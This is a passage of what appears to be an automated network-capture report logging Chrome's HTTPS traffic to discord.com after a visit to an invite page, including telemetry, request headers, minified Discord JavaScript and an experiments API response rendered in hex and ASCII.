                                                                          2023-12-10 16:45:21 UTC1024OUTData Raw: 7b 22 65 76 65 6e 74 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 75 73 65 72 5f 66 69 6e 67 65 72 70 72 69 6e 74 5f 63 68 61 6e 67 65 64 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 63 6c 69 65 6e 74 5f 74 72 61 63 6b 5f 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 30 32 32 32 36 37 32 30 33 38 32 2c 22 6f 6c 64 5f 66 69 6e 67 65 72 70 72 69 6e 74 22 3a 6e 75 6c 6c 2c 22 6e 65 77 5f 66 69 6e 67 65 72 70 72 69 6e 74 22 3a 22 31 31 38 33 34 34 39 33 38 36 38 39 34 37 37 30 33 31 37 22 2c 22 63 6c 69 65 6e 74 5f 70 65 72 66 6f 72 6d 61 6e 63 65 5f 6d 65 6d 6f 72 79 22 3a 30 2c 22 61 63 63 65 73 73 69 62 69 6c 69 74 79 5f 66 65 61 74 75 72 65 73 22 3a 31 32 38 2c 22 72 65 6e 64 65 72 65 64 5f 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 2c 22 75 70 74 69 6d 65 5f
                                                                          Data Ascii: {"events":[{"type":"user_fingerprint_changed","properties":{"client_track_timestamp":1702226720382,"old_fingerprint":null,"new_fingerprint":"1183449386894770317","client_performance_memory":0,"accessibility_features":128,"rendered_locale":"en-US","uptime_
                                                                          2023-12-10 16:45:21 UTC819INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 31 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 4f 72 69 67 69 6e 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a
                                                                          Data Ascii: HTTP/1.1 204 No ContentDate: Sun, 10 Dec 2023 16:45:21 GMTConnection: closevary: Origin, Access-Control-Request-Method, Access-Control-Request-Headersaccess-control-allow-origin: https://discord.comVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          334192.168.2.550070162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:21 UTC866OUTGET /assets/98106.5d0f74b94113ede84656.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
                                                                          2023-12-10 16:45:22 UTC1135INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 30 35 37 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 33 34 37 64 63 32 33 37 30 63 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:22 GMTContent-Type: application/javascriptContent-Length: 110574Connection: closeCF-Ray: 8336f5347dc2370c-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:22 UTC234INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 39 38 31 30 36 22 5d 2c 7b 38 37 35 36 30 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 65 2e 6c 65 6e 67 74 68 2c 6f 3d 6e 5e 6e 2c 72 3d 30 3b 6e 3e 3d 34 3b 29 74 3d 28 36 35 35 33 35 26 28 74 3d 32 35 35 26 65
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["98106"],{875603:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return o}});var o=function(e){for(var t,n=e.length,o=n^n,r=0;n>=4;)t=(65535&(t=255&e
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 2e 63 68 61 72 43 6f 64 65 41 74 28 72 29 7c 28 32 35 35 26 65 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 72 29 29 3c 3c 38 7c 28 32 35 35 26 65 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 72 29 29 3c 3c 31 36 7c 28 32 35 35 26 65 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 72 29 29 3c 3c 32 34 29 29 2a 31 35 34 30 34 38 33 34 37 37 2b 28 28 28 74 3e 3e 3e 31 36 29 2a 31 35 34 30 34 38 33 34 37 37 26 36 35 35 33 35 29 3c 3c 31 36 29 2c 74 5e 3d 74 3e 3e 3e 32 34 2c 6f 3d 28 36 35 35 33 35 26 6f 29 2a 31 35 34 30 34 38 33 34 37 37 2b 28 28 28 6f 3e 3e 3e 31 36 29 2a 31 35 34 30 34 38 33 34 37 37 26 36 35 35 33 35 29 3c 3c 31 36 29 5e 28 74 3d 28 36 35 35 33 35 26 74 29 2a 31 35 34 30 34 38 33 34 37 37 2b 28 28 28 74 3e 3e 3e 31 36 29 2a 31 35 34 30 34 38 33 34
                                                                          Data Ascii: .charCodeAt(r)|(255&e.charCodeAt(++r))<<8|(255&e.charCodeAt(++r))<<16|(255&e.charCodeAt(++r))<<24))*1540483477+(((t>>>16)*1540483477&65535)<<16),t^=t>>>24,o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16)^(t=(65535&t)*1540483477+(((t>>>16)*15404834
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 22 29 2b 65 2e 74 72 69 6d 28 29 29 7d 72 65 74 75 72 6e 20 65 2b 74 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 6e 2c 69 29 7b 76 61 72 20 61 3d 65 2b 22 3b 22 2c 75 3d 32 2a 74 2b 33 2a 6e 2b 34 2a 69 3b 69 66 28 39 34 34 3d 3d 3d 75 29 7b 65 3d 61 2e 69 6e 64 65 78 4f 66 28 22 3a 22 2c 39 29 2b 31 3b 76 61 72 20 73 3d 61 2e 73 75 62 73 74 72 69 6e 67 28 65 2c 61 2e 6c 65 6e 67 74 68 2d 31 29 2e 74 72 69 6d 28 29 3b 72 65 74 75 72 6e 20 73 3d 61 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 65 29 2e 74 72 69 6d 28 29 2b 73 2b 22 3b 22 2c 31 3d 3d 3d 44 7c 7c 32 3d 3d 3d 44 26 26 72 28 73 2c 31 29 3f 22 2d 77 65 62 6b 69 74 2d 22 2b 73 2b 73 3a 73 7d 69 66 28 30 3d 3d 3d 44 7c 7c 32 3d 3d 3d 44 26 26 21 72 28 61 2c 31 29 29 72 65 74 75 72 6e 20 61 3b 73 77
                                                                          Data Ascii: ")+e.trim())}return e+t}function o(e,t,n,i){var a=e+";",u=2*t+3*n+4*i;if(944===u){e=a.indexOf(":",9)+1;var s=a.substring(e,a.length-1).trim();return s=a.substring(0,e).trim()+s+";",1===D||2===D&&r(s,1)?"-webkit-"+s+s:s}if(0===D||2===D&&!r(a,1))return a;sw
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 2d 22 29 2b 61 3a 61 3b 63 61 73 65 20 31 65 33 3a 73 77 69 74 63 68 28 74 3d 28 73 3d 61 2e 73 75 62 73 74 72 69 6e 67 28 31 33 29 2e 74 72 69 6d 28 29 29 2e 69 6e 64 65 78 4f 66 28 22 2d 22 29 2b 31 2c 73 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2b 73 2e 63 68 61 72 43 6f 64 65 41 74 28 74 29 29 7b 63 61 73 65 20 32 32 36 3a 73 3d 61 2e 72 65 70 6c 61 63 65 28 62 2c 22 74 62 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 33 32 3a 73 3d 61 2e 72 65 70 6c 61 63 65 28 62 2c 22 74 62 2d 72 6c 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 32 30 3a 73 3d 61 2e 72 65 70 6c 61 63 65 28 62 2c 22 6c 72 22 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 61 7d 72 65 74 75 72 6e 22 2d 77 65 62 6b 69 74 2d 22 2b 61 2b 22 2d 6d 73 2d 22 2b 73 2b 61
                                                                          Data Ascii: -")+a:a;case 1e3:switch(t=(s=a.substring(13).trim()).indexOf("-")+1,s.charCodeAt(0)+s.charCodeAt(t)){case 226:s=a.replace(b,"tb");break;case 232:s=a.replace(b,"tb-rl");break;case 220:s=a.replace(b,"lr");break;default:return a}return"-webkit-"+a+"-ms-"+s+a
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 68 61 72 43 6f 64 65 41 74 28 35 29 3f 22 2d 6d 73 2d 22 2b 61 3a 22 22 29 2b 61 2c 32 31 31 3d 3d 3d 6e 2b 69 26 26 31 30 35 3d 3d 3d 61 2e 63 68 61 72 43 6f 64 65 41 74 28 31 33 29 26 26 30 3c 61 2e 69 6e 64 65 78 4f 66 28 22 74 72 61 6e 73 66 6f 72 6d 22 2c 31 30 29 29 72 65 74 75 72 6e 20 61 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 61 2e 69 6e 64 65 78 4f 66 28 22 3b 22 2c 32 37 29 2b 31 29 2e 72 65 70 6c 61 63 65 28 66 2c 22 24 31 2d 77 65 62 6b 69 74 2d 24 32 22 29 2b 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e 69 6e 64 65 78 4f 66 28 31 3d 3d 3d 74 3f 22 3a 22 3a 22 7b 22 29 2c 6f 3d 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 33 21 3d 3d 74 3f 6e 3a 31 30 29 3b 72 65 74 75 72 6e 20 6e 3d 65
                                                                          Data Ascii: harCodeAt(5)?"-ms-"+a:"")+a,211===n+i&&105===a.charCodeAt(13)&&0<a.indexOf("transform",10))return a.substring(0,a.indexOf(";",27)+1).replace(f,"$1-webkit-$2")+a}return a}function r(e,t){var n=e.indexOf(1===t?":":"{"),o=e.substring(0,3!==t?n:10);return n=e
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 61 73 65 20 34 37 3a 73 77 69 74 63 68 28 68 3d 73 2e 63 68 61 72 43 6f 64 65 41 74 28 4e 2b 31 29 29 7b 63 61 73 65 20 34 32 3a 63 61 73 65 20 34 37 3a 65 3a 7b 66 6f 72 28 54 3d 4e 2b 31 3b 54 3c 55 3b 2b 2b 54 29 73 77 69 74 63 68 28 73 2e 63 68 61 72 43 6f 64 65 41 74 28 54 29 29 7b 63 61 73 65 20 34 37 3a 69 66 28 34 32 3d 3d 3d 68 26 26 34 32 3d 3d 3d 73 2e 63 68 61 72 43 6f 64 65 41 74 28 54 2d 31 29 26 26 4e 2b 32 21 3d 3d 54 29 7b 4e 3d 54 2b 31 3b 62 72 65 61 6b 20 65 7d 62 72 65 61 6b 3b 63 61 73 65 20 31 30 3a 69 66 28 34 37 3d 3d 3d 68 29 7b 4e 3d 54 2b 31 3b 62 72 65 61 6b 20 65 7d 7d 4e 3d 54 7d 7d 62 72 65 61 6b 3b 63 61 73 65 20 39 31 3a 68 2b 2b 3b 63 61 73 65 20 34 30 3a 68 2b 2b 3b 63 61 73 65 20 33 34 3a 63 61 73 65 20 33 39 3a 66 6f
                                                                          Data Ascii: ase 47:switch(h=s.charCodeAt(N+1)){case 42:case 47:e:{for(T=N+1;T<U;++T)switch(s.charCodeAt(T)){case 47:if(42===h&&42===s.charCodeAt(T-1)&&N+2!==T){N=T+1;break e}break;case 10:if(47===h){N=T+1;break e}}N=T}}break;case 91:h++;case 40:h++;case 34:case 39:fo
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 3d 30 2c 48 3d 22 22 2c 68 3d 73 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 4e 29 7d 7d 73 77 69 74 63 68 28 68 29 7b 63 61 73 65 20 31 33 3a 63 61 73 65 20 31 30 3a 34 37 3d 3d 3d 78 3f 78 3d 30 3a 30 3d 3d 3d 31 2b 66 26 26 31 30 37 21 3d 3d 70 26 26 30 3c 48 2e 6c 65 6e 67 74 68 26 26 28 52 3d 31 2c 48 2b 3d 22 5c 78 30 30 22 29 2c 30 3c 50 2a 56 26 26 61 28 30 2c 48 2c 75 2c 6e 2c 6b 2c 77 2c 57 2e 6c 65 6e 67 74 68 2c 70 2c 64 2c 70 29 2c 77 3d 31 2c 6b 2b 2b 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 39 3a 63 61 73 65 20 31 32 35 3a 69 66 28 30 3d 3d 3d 78 2b 53 2b 41 2b 4f 29 7b 77 2b 2b 3b 62 72 65 61 6b 7d 64 65 66 61 75 6c 74 3a 73 77 69 74 63 68 28 77 2b 2b 2c 62 3d 73 2e 63 68 61 72 41 74 28 4e 29 2c 68 29 7b 63 61 73 65 20 39 3a 63 61 73 65 20 33
                                                                          Data Ascii: =0,H="",h=s.charCodeAt(++N)}}switch(h){case 13:case 10:47===x?x=0:0===1+f&&107!==p&&0<H.length&&(R=1,H+="\x00"),0<P*V&&a(0,H,u,n,k,w,W.length,p,d,p),w=1,k++;break;case 59:case 125:if(0===x+S+A+O){w++;break}default:switch(w++,b=s.charAt(N),h){case 9:case 3
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 69 74 2d 69 6e 70 75 74 2d 24 31 22 29 2b 57 2e 72 65 70 6c 61 63 65 28 76 2c 22 3a 3a 2d 6d 6f 7a 2d 24 31 22 29 2b 57 2e 72 65 70 6c 61 63 65 28 76 2c 22 3a 2d 6d 73 2d 69 6e 70 75 74 2d 24 31 22 29 2b 57 7d 46 3d 30 7d 7d 72 65 74 75 72 6e 20 47 2b 57 2b 7a 7d 28 4d 2c 75 2c 6e 2c 30 2c 30 29 3b 72 65 74 75 72 6e 20 30 3c 50 26 26 76 6f 69 64 20 30 21 3d 3d 28 73 3d 61 28 2d 32 2c 70 2c 75 2c 75 2c 6b 2c 77 2c 70 2e 6c 65 6e 67 74 68 2c 30 2c 30 2c 30 29 29 26 26 28 70 3d 73 29 2c 54 3d 22 22 2c 46 3d 30 2c 77 3d 6b 3d 31 2c 70 7d 76 61 72 20 6c 3d 2f 5e 5c 30 2b 2f 67 2c 63 3d 2f 5b 5c 30 5c 72 5c 66 5d 2f 67 2c 70 3d 2f 3a 20 2a 2f 67 2c 64 3d 2f 7a 6f 6f 7c 67 72 61 2f 2c 66 3d 2f 28 5b 2c 3a 20 5d 29 28 74 72 61 6e 73 66 6f 72 6d 29 2f 67 2c 68 3d
                                                                          Data Ascii: it-input-$1")+W.replace(v,"::-moz-$1")+W.replace(v,":-ms-input-$1")+W}F=0}}return G+W+z}(M,u,n,0,0);return 0<P&&void 0!==(s=a(-2,p,u,u,k,w,p.length,0,0,0))&&(p=s),T="",F=0,w=k=1,p}var l=/^\0+/g,c=/[\0\r\f]/g,p=/: */g,d=/zoo|gra/,f=/([,: ])(transform)/g,h=
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 63 69 74 79 3a 31 2c 73 74 6f 70 4f 70 61 63 69 74 79 3a 31 2c 73 74 72 6f 6b 65 44 61 73 68 61 72 72 61 79 3a 31 2c 73 74 72 6f 6b 65 44 61 73 68 6f 66 66 73 65 74 3a 31 2c 73 74 72 6f 6b 65 4d 69 74 65 72 6c 69 6d 69 74 3a 31 2c 73 74 72 6f 6b 65 4f 70 61 63 69 74 79 3a 31 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 31 7d 7d 2c 39 36 39 38 30 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 7d 29 2c 6e 28 22 37 38 31 37 33 38 22 29 2c 6e 28 22 37 30 31 30 32 22 29 2c 6e 28 22 34 32 34 39 37 33 22 29 2c 6e 28 22 32 32 32 30 30 37 22 29 3b 76 61 72 20 6f 3d 6e 28 22 33 36 33 39 35 34 22 29 2c
                                                                          Data Ascii: city:1,stopOpacity:1,strokeDasharray:1,strokeDashoffset:1,strokeMiterlimit:1,strokeOpacity:1,strokeWidth:1}},969806:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return m}}),n("781738"),n("70102"),n("424973"),n("222007");var o=n("363954"),


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          335192.168.2.550071162.159.138.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:21 UTC683OUTGET /api/v9/experiments?with_guild_experiments=true HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
                                                                          2023-12-10 16:45:22 UTC773INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 3b 20 70 72 65 6c 6f 61 64 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 76 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:22 GMTContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closestrict-transport-security: max-age=31536000; includeSubDomains; preloadvary: Accept-Encodingvia: 1.1 googleAlt-Svc:
                                                                          2023-12-10 16:45:22 UTC596INData Raw: 61 36 62 0d 0a 7b 22 66 69 6e 67 65 72 70 72 69 6e 74 22 3a 22 31 31 38 33 34 34 39 33 39 30 35 31 30 32 35 32 30 38 32 2e 74 4b 52 54 4b 61 35 78 5a 57 55 78 6c 42 50 30 71 76 67 56 48 63 4e 72 67 38 67 22 2c 22 61 73 73 69 67 6e 6d 65 6e 74 73 22 3a 5b 5b 34 31 33 30 38 33 37 31 39 30 2c 30 2c 31 30 2c 2d 31 2c 30 2c 31 38 30 30 2c 30 2c 30 5d 2c 5b 34 31 38 31 34 31 37 39 33 39 2c 30 2c 31 2c 2d 31 2c 36 2c 38 33 36 30 2c 30 2c 30 5d 2c 5b 32 38 31 30 32 30 35 34 38 37 2c 31 2c 31 2c 2d 31 2c 33 2c 32 36 33 36 2c 30 2c 30 5d 2c 5b 33 33 31 36 37 32 30 37 31 31 2c 30 2c 31 2c 2d 31 2c 31 2c 34 31 36 38 2c 30 2c 30 5d 2c 5b 32 36 31 37 32 31 38 34 34 34 2c 34 2c 31 2c 2d 31 2c 32 2c 34 32 38 38 2c 30 2c 30 5d 2c 5b 33 30 33 35 36 37 34 37 36 37 2c 30 2c
                                                                          Data Ascii: a6b{"fingerprint":"1183449390510252082.tKRTKa5xZWUxlBP0qvgVHcNrg8g","assignments":[[4130837190,0,10,-1,0,1800,0,0],[4181417939,0,1,-1,6,8360,0,0],[2810205487,1,1,-1,3,2636,0,0],[3316720711,0,1,-1,1,4168,0,0],[2617218444,4,1,-1,2,4288,0,0],[3035674767,0,
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 2c 2d 31 2c 30 2c 36 38 31 2c 30 2c 30 5d 2c 5b 33 36 35 36 37 39 36 34 36 30 2c 33 2c 30 2c 2d 31 2c 33 2c 31 37 39 35 2c 30 2c 30 5d 2c 5b 31 31 37 36 37 36 39 37 30 32 2c 31 2c 31 2c 2d 31 2c 32 2c 39 38 32 34 2c 30 2c 30 5d 2c 5b 31 38 31 34 34 38 33 32 39 30 2c 30 2c 31 2c 2d 31 2c 30 2c 36 32 38 33 2c 30 2c 30 5d 2c 5b 34 32 32 31 30 30 36 37 32 36 2c 30 2c 31 2c 2d 31 2c 30 2c 35 33 36 32 2c 30 2c 30 5d 2c 5b 34 31 35 36 30 37 33 32 36 30 2c 33 2c 32 2c 2d 31 2c 30 2c 34 30 35 35 2c 30 2c 30 5d 2c 5b 33 34 38 32 38 30 37 35 34 32 2c 31 33 2c 31 2c 2d 31 2c 31 2c 33 37 35 36 2c 30 2c 30 5d 2c 5b 31 33 39 38 36 37 33 39 32 31 2c 31 2c 31 2c 2d 31 2c 30 2c 36 37 37 36 2c 30 2c 30 5d 2c 5b 32 35 33 32 37 30 30 35 33 33 2c 30 2c 31 2c 2d 31 2c 30 2c 35
                                                                          Data Ascii: ,-1,0,681,0,0],[3656796460,3,0,-1,3,1795,0,0],[1176769702,1,1,-1,2,9824,0,0],[1814483290,0,1,-1,0,6283,0,0],[4221006726,0,1,-1,0,5362,0,0],[4156073260,3,2,-1,0,4055,0,0],[3482807542,13,1,-1,1,3756,0,0],[1398673921,1,1,-1,0,6776,0,0],[2532700533,0,1,-1,0,5
                                                                          2023-12-10 16:45:22 UTC709INData Raw: 35 38 31 30 30 2c 30 2c 31 2c 2d 31 2c 30 2c 36 31 33 39 2c 30 2c 30 5d 2c 5b 34 31 36 39 34 39 34 37 31 33 2c 30 2c 31 2c 2d 31 2c 30 2c 32 31 35 35 2c 30 2c 30 5d 2c 5b 32 32 32 39 38 31 30 39 39 33 2c 30 2c 31 2c 2d 31 2c 30 2c 33 30 30 34 2c 30 2c 30 5d 2c 5b 33 30 32 39 33 38 37 39 34 35 2c 31 2c 31 2c 2d 31 2c 30 2c 32 37 39 39 2c 30 2c 30 5d 2c 5b 37 38 35 33 39 31 34 37 32 2c 30 2c 31 2c 2d 31 2c 30 2c 32 39 31 32 2c 30 2c 30 5d 2c 5b 31 37 38 38 39 33 33 39 35 31 2c 32 2c 31 2c 2d 31 2c 30 2c 37 34 33 36 2c 30 2c 30 5d 2c 5b 31 38 33 36 38 38 39 32 35 2c 30 2c 31 2c 2d 31 2c 30 2c 36 35 37 38 2c 30 2c 30 5d 2c 5b 31 32 38 39 30 33 34 32 32 33 2c 33 2c 32 2c 2d 31 2c 31 2c 31 31 38 34 2c 30 2c 30 5d 2c 5b 33 36 38 31 34 30 32 38 37 38 2c 30 2c 31
                                                                          Data Ascii: 58100,0,1,-1,0,6139,0,0],[4169494713,0,1,-1,0,2155,0,0],[2229810993,0,1,-1,0,3004,0,0],[3029387945,1,1,-1,0,2799,0,0],[785391472,0,1,-1,0,2912,0,0],[1788933951,2,1,-1,0,7436,0,0],[183688925,0,1,-1,0,6578,0,0],[1289034223,3,2,-1,1,1184,0,0],[3681402878,0,1
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 37 66 66 32 0d 0a 31 2c 30 2c 31 2c 2d 31 2c 30 2c 31 32 33 35 2c 30 2c 30 5d 2c 5b 32 36 31 36 39 30 34 33 30 30 2c 30 2c 31 2c 2d 31 2c 30 2c 32 34 34 32 2c 30 2c 30 5d 2c 5b 33 38 33 39 31 32 31 36 33 33 2c 31 2c 31 2c 2d 31 2c 30 2c 34 31 33 37 2c 30 2c 30 5d 2c 5b 32 38 38 39 36 38 37 30 36 2c 30 2c 31 2c 2d 31 2c 33 2c 38 37 36 31 2c 30 2c 30 5d 2c 5b 31 30 34 35 37 33 30 32 30 33 2c 33 2c 31 2c 2d 31 2c 31 2c 35 36 36 31 2c 30 2c 30 5d 2c 5b 33 35 32 32 33 37 38 37 31 36 2c 30 2c 31 2c 2d 31 2c 31 2c 36 38 32 33 2c 30 2c 30 5d 2c 5b 32 30 39 31 32 30 32 35 37 34 2c 30 2c 31 2c 2d 31 2c 30 2c 31 37 30 2c 30 2c 30 5d 2c 5b 34 32 36 35 39 31 38 39 38 39 2c 30 2c 31 2c 2d 31 2c 30 2c 34 31 35 30 2c 30 2c 30 5d 2c 5b 33 31 39 30 33 36 38 39 32 30 2c 30
                                                                          Data Ascii: 7ff21,0,1,-1,0,1235,0,0],[2616904300,0,1,-1,0,2442,0,0],[3839121633,1,1,-1,0,4137,0,0],[288968706,0,1,-1,3,8761,0,0],[1045730203,3,1,-1,1,5661,0,0],[3522378716,0,1,-1,1,6823,0,0],[2091202574,0,1,-1,0,170,0,0],[4265918989,0,1,-1,0,4150,0,0],[3190368920,0
